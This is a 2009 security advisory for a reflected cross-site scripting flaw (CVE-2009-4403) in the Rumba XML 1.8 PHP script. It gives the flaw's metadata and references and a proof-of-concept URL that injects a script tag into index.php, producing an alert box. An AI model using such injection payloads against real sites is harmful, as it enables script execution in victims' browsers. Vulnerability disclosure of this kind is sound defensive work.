Topic : | Rumba XML 1.8 XSS vulnerability
|
SecurityAlert : 6873
CVE : CVE-2009-4403
CWE : CWE-79
SecurityRisk : Low (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : Yes
Exploit Available : No
Credit : Hadi Kiamarsi
Published : 25.12.2009
Affected Software : | rumbacms:rumba_xml:1.8 |
 Advisory Content : ###########################################
#
# Script Name : Rumba XML ( All Version )
#
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download :
http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca
9/600056463/webscripts/PHP/xml18eng.zip
#
###########################################
PoC :
http://[target]/[path]/index.php/>"><script>alert('Hadi
Kiamarsi')</script>
example :
http://www.example.com/index.php/>"><script>alert('Hadi
Kiamarsi')</script>
local Example :
http://localhost/index.php/>"><script>alert('Hadi Kiamarsi')</script>
References :
http://xforce.iss.net/xforce/xfdb/54913
http://www.securityfocus.com/archive/1/archive/1/508536/100/0/threaded
http://www.exploit-db.com/exploits/10534
http://secunia.com/advisories/37840
http://osvdb.org/61137
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|